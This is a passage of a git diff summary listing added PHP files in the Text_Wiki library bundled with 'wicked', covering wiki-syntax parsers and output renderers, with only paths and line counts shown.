 .../Text_Wiki/Text/Wiki/Parse/Default/Newline.php  |   75 +
 .../Text/Wiki/Parse/Default/Paragraph.php          |  116 ++
 .../Text/Wiki/Parse/Default/Phplookup.php          |   73 +
 .../Text/Wiki/Parse/Default/Prefilter.php          |   84 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Raw.php  |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Revise.php   |  145 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Smiley.php   |  157 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Strong.php   |   86 ++
 .../Text/Wiki/Parse/Default/Subscript.php          |   79 +
 .../Text/Wiki/Parse/Default/Superscript.php        |   79 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Table.php    |  226 +++
 .../Text_Wiki/Text/Wiki/Parse/Default/Tighten.php  |   49 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Toc.php  |  130 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Tt.php   |   84 ++
 .../Text/Wiki/Parse/Default/Underline.php          |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Url.php  |  281 ++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Wikilink.php |  203 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Anchor.php  |   88 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Blockquote.php  |  180 +++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Bold.php |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Break.php   |   73 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Center.php  |   79 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Code.php |   95 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Colortext.php   |   90 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Deflist.php |  123 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Delimiter.php   |   80 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Embed.php   |  107 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Emphasis.php    |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Freelink.php    |   99 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Function.php    |  142 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Heading.php |  107 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Horiz.php   |   70 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Html.php |   75 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Image.php   |   99 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Include.php |  101 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Interwiki.php   |   96 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Italic.php  |   84 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/List.php |  248 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Newline.php |   75 +
 .../Text_Wiki/Text/Wiki/Parse/Doku/Paragraph.php   |  146 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Phplookup.php   |   74 +
 .../Text_Wiki/Text/Wiki/Parse/Doku/Prefilter.php   |   78 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Raw.php  |   87 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Revise.php  |  168 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Strong.php  |   90 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Subscript.php   |   79 +
 .../Text_Wiki/Text/Wiki/Parse/Doku/Superscript.php |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Table.php   |  240 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Tighten.php |   49 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Toc.php  |   84 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Tt.php   |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Underline.php   |   79 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Url.php  |  326 +++++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Wikilink.php    |  123 ++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Break.php  |   59 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Code.php   |   91 ++
 .../Text/Wiki/Parse/Mediawiki/Comment.php          |   59 +
 .../Text/Wiki/Parse/Mediawiki/Deflist.php          |  293 ++++
 .../Text/Wiki/Parse/Mediawiki/Emphasis.php         |  264 ++++
 .../Text/Wiki/Parse/Mediawiki/Heading.php          |   94 ++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/List.php   |  232 +++
 .../Text/Wiki/Parse/Mediawiki/Newline.php          |   59 +
 .../Text/Wiki/Parse/Mediawiki/Preformatted.php     |   72 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Raw.php    |   61 +
 .../Text/Wiki/Parse/Mediawiki/Redirect.php         |   77 +
 .../Text/Wiki/Parse/Mediawiki/Subscript.php        |   65 +
 .../Text/Wiki/Parse/Mediawiki/Superscript.php      |   65 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Table.php  |  286 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Tt.php |   71 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Url.php    |  318 ++++
 .../Text/Wiki/Parse/Mediawiki/Wikilink.php         |  312 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Anchor.php  |   89 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Blockquote.php  |  181 +++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Bold.php |   81 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Box.php  |   81 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Break.php   |   74 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Center.php  |   80 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Code.php |  116 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Colortext.php   |   91 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Deflist.php |  124 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Delimiter.php   |   82 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Embed.php   |  108 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Emphasis.php    |   87 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Freelink.php    |  138 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Heading.php |  132 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Horiz.php   |   72 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Html.php |   77 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Image.php   |  114 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Include.php |  102 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Interwiki.php   |  140 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Italic.php  |   87 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/List.php |  250 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Newline.php |   77 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Page.php |   69 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Paragraph.php   |  148 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Plugin.php  |  134 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Prefilter.php   |   80 +
 .../Text/Wiki/Parse/Tiki/Preformatted.php          |   74 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Raw.php  |   74 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Revise.php  |  147 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Smiley.php  |   67 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Specialchar.php |   73 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Strong.php  |   92 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Subscript.php   |   82 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Superscript.php |   82 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Table.php   |  235 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Tighten.php |   51 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Titlebar.php    |   45 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Toc.php  |   82 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Tt.php   |   86 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Underline.php   |   81 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Url.php  |  293 ++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Wikilink.php    |  224 +++
 wicked/lib/Text_Wiki/Text/Wiki/Render.php          |  218 +++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Cowiki.php   |   16 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Anchor.php   |   23 +
 .../Text/Wiki/Render/Cowiki/Blockquote.php         |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Bold.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Box.php  |   33 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Break.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Center.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Code.php |   23 +
 .../Text/Wiki/Render/Cowiki/Colortext.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Deflist.php  |   23 +
 .../Text/Wiki/Render/Cowiki/Delimiter.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Embed.php    |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Emphasis.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Freelink.php |    9 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Function.php |   25 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Heading.php  |   13 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Horiz.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Html.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Image.php    |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Include.php  |    8 +
 .../Text/Wiki/Render/Cowiki/Interwiki.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Italic.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/List.php |   56 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Newline.php  |   13 +
 .../Text/Wiki/Render/Cowiki/Paragraph.php          |   23 +
 .../Text/Wiki/Render/Cowiki/Phplookup.php          |   25 +
 .../Text/Wiki/Render/Cowiki/Prefilter.php          |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Raw.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Revise.php   |   36 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Strong.php   |   23 +
 .../Text/Wiki/Render/Cowiki/Subscript.php          |   29 +
 .../Text/Wiki/Render/Cowiki/Superscript.php        |   29 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Table.php    |   55 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Tighten.php  |   10 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Toc.php  |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Tt.php   |   29 +
 .../Text/Wiki/Render/Cowiki/Underline.php          |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Url.php  |   45 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Wikilink.php |   29 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Creole.php   |   16 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Address.php  |   29 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Anchor.php   |   23 +
 .../Text/Wiki/Render/Creole/Blockquote.php         |   47 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Bold.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Box.php  |   30 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Break.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Center.php   |   30 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Code.php |   23 +
 .../Text/Wiki/Render/Creole/Colortext.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Deflist.php  |   23 +
 .../Text/Wiki/Render/Creole/Delimiter.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Embed.php    |   29 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Emphasis.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Freelink.php |    9 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Function.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Heading.php  |   16 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Horiz.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Html.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Image.php    |   26 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Include.php  |   16 +
 .../Text/Wiki/Render/Creole/Interwiki.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Italic.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/List.php |   53 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Newline.php  |   12 +
 .../Text/Wiki/Render/Creole/Paragraph.php          |   29 +
 .../Text/Wiki/Render/Creole/Phplookup.php          |   25 +
 .../Text/Wiki/Render/Creole/Prefilter.php          |   10 +
 .../Text/Wiki/Render/Creole/Preformatted.php       |   27 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Raw.php  |   33 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Revise.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Strong.php   |   23 +
 .../Text/Wiki/Render/Creole/Subscript.php          |   23 +
 .../Text/Wiki/Render/Creole/Superscript.php        |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Table.php    |   70 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Tighten.php  |   10 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Toc.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Tt.php   |   29 +
 .../Text/Wiki/Render/Creole/Underline.php          |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Url.php  |   40 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Wikilink.php |   43 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Docbook.php  |   45 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Anchor.php  |   40 +
 .../Text/Wiki/Render/Docbook/Blockquote.php        |   53 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Bold.php    |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Box.php |   54 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Break.php   |   47 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Center.php  |   51 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Code.php    |   52 +
 .../Text/Wiki/Render/Docbook/Colortext.php         |   80 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Deflist.php |   75 +
 .../Text/Wiki/Render/Docbook/Delimiter.php         |   46 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Embed.php   |   47 +
 .../Text/Wiki/Render/Docbook/Emphasis.php          |   55 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Font.php    |   59 +
 .../Text/Wiki/Render/Docbook/Freelink.php          |   35 +
 .../Text/Wiki/Render/Docbook/Function.php          |   73 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Heading.php |  185 +++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Horiz.php   |   46 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Html.php    |   48 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Image.php   |  180 +++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Include.php |   32 +
 .../Text/Wiki/Render/Docbook/Interwiki.php         |   80 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Italic.php  |   54 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/List.php    |   95 ++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Newline.php |   34 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Page.php    |   46 +
 .../Text/Wiki/Render/Docbook/Paragraph.php         |   49 +
 .../Text/Wiki/Render/Docbook/Phplookup.php         |   59 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Plugin.php  |   47 +
 .../Text/Wiki/Render/Docbook/Prefilter.php         |   34 +
 .../Text/Wiki/Render/Docbook/Preformatted.php      |   46 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Raw.php |   45 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Revise.php  |   61 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Smiley.php  |   74 +
 .../Text/Wiki/Render/Docbook/Specialchar.php       |   52 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Strong.php  |   54 +
 .../Text/Wiki/Render/Docbook/Subscript.php         |   49 +
 .../Text/Wiki/Render/Docbook/Superscript.php       |   49 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Table.php   |  140 ++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Tighten.php |   34 +
 .../Text/Wiki/Render/Docbook/Titlebar.php          |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Toc.php |  115 ++
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Tt.php  |   49 +
 .../Text/Wiki/Render/Docbook/Underline.php         |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Url.php |  125 ++
 .../Text/Wiki/Render/Docbook/Wikilink.php          |  160 ++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku.php     |   16 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Anchor.php |   33 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Blockquote.php |   37 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Bold.php   |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Box.php |   34 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Break.php  |   24 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Center.php |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Code.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Colortext.php  |   52 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Deflist.php    |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Delimiter.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Embed.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Emphasis.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Freelink.php   |    9 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Function.php   |   70 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Heading.php    |   11 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Horiz.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Html.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Image.php  |   39 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Include.php    |    8 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Interwiki.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Italic.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/List.php   |   56 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Newline.php    |   13 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Paragraph.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Phplookup.php  |   25 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Prefilter.php  |   25 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Raw.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Revise.php |   36 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Strong.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Subscript.php  |   29 +
 .../Text/Wiki/Render/Doku/Superscript.php          |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Table.php  |   96 ++
 .../Text_Wiki/Text/Wiki/Render/Doku/Tighten.php    |   10 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Toc.php |   26 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Tt.php  |   29 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Underline.php  |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Url.php |   52 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Wikilink.php   |   33 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex.php    |   90 ++
 .../Text_Wiki/Text/Wiki/Render/Latex/Anchor.php    |   33 +
 .../Text/Wiki/Render/Latex/Blockquote.php          |   36 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Bold.php  |   28 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Box.php   |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Break.php |   24 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Center.php    |   33 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Code.php  |   26 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Colortext.php |   58 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Deflist.php   |   53 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Delimiter.php |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Embed.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Emphasis.php  |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Font.php  |   73 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Freelink.php  |    8 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Function.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Heading.php   |   33 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Horiz.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Html.php  |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Image.php |   70 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Include.php   |    8 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Interwiki.php |   58 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Italic.php    |   28 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/List.php  |   76 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Newline.php   |   12 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Page.php  |   48 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Paragraph.php |   31 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Phplookup.php |   34 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Plugin.php    |   49 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Prefilter.php |   24 +
 .../Text/Wiki/Render/Latex/Preformatted.php        |   48 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Raw.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Revise.php    |   38 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Smiley.php    |   44 +
 .../Text/Wiki/Render/Latex/Specialchar.php         |   54 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Strong.php    |   30 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Subscript.php |   54 +
 .../Text/Wiki/Render/Latex/Superscript.php         |   31 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Table.php |   99 ++
 .../Text_Wiki/Text/Wiki/Render/Latex/Tighten.php   |    9 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Titlebar.php  |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Toc.php   |   30 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex/Tt.php |   30 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Underline.php |   30 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Url.php   |   41 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Wikilink.php  |   63 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain.php    |   16 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Anchor.php    |   23 +
 .../Text/Wiki/Render/Plain/Blockquote.php          |   39 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Bold.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Box.php   |   48 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Break.php |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Center.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Code.php  |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Colortext.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Deflist.php   |   59 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Delimiter.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Embed.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Emphasis.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Font.php  |   44 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Freelink.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Function.php  |   39 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Heading.php   |   14 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Horiz.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Html.php  |   24 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Image.php |   22 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Include.php   |    8 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Interwiki.php |   29 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Italic.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/List.php  |   68 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Newline.php   |   12 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Page.php  |   48 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Paragraph.php |   31 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Phplookup.php |   25 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Plugin.php    |   49 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Prefilter.php |   24 +
 .../Text/Wiki/Render/Plain/Preformatted.php        |   48 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Raw.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Revise.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Smiley.php    |   44 +
 .../Text/Wiki/Render/Plain/Specialchar.php         |   54 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Strong.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Subscript.php |   48 +
 .../Text/Wiki/Render/Plain/Superscript.php         |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Table.php |   65 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Tighten.php   |   10 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Titlebar.php  |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Toc.php   |   39 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain/Tt.php |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Underline.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Url.php   |   29 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Wikilink.php  |   24 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki.php     |   16 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Anchor.php |   29 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Blockquote.php |   35 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Bold.php   |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Box.php |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Break.php  |   24 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Center.php |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Code.php   |   27 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Colortext.php  |   52 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Deflist.php    |   68 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Delimiter.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Embed.php  |   23 +
